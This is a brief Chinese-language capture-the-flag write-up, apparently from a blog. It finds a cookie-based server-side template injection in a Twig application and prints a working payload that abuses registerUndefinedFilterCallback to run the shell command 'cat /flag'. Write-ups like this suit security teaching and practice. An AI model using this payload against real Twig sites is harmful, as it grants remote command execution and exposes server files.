image.png
找了一圈,在flag.php页面发现一个输入框,抓包看下
image.png
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{{7*7}}
image.png
返回49,用的是Twig模块
payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
image.png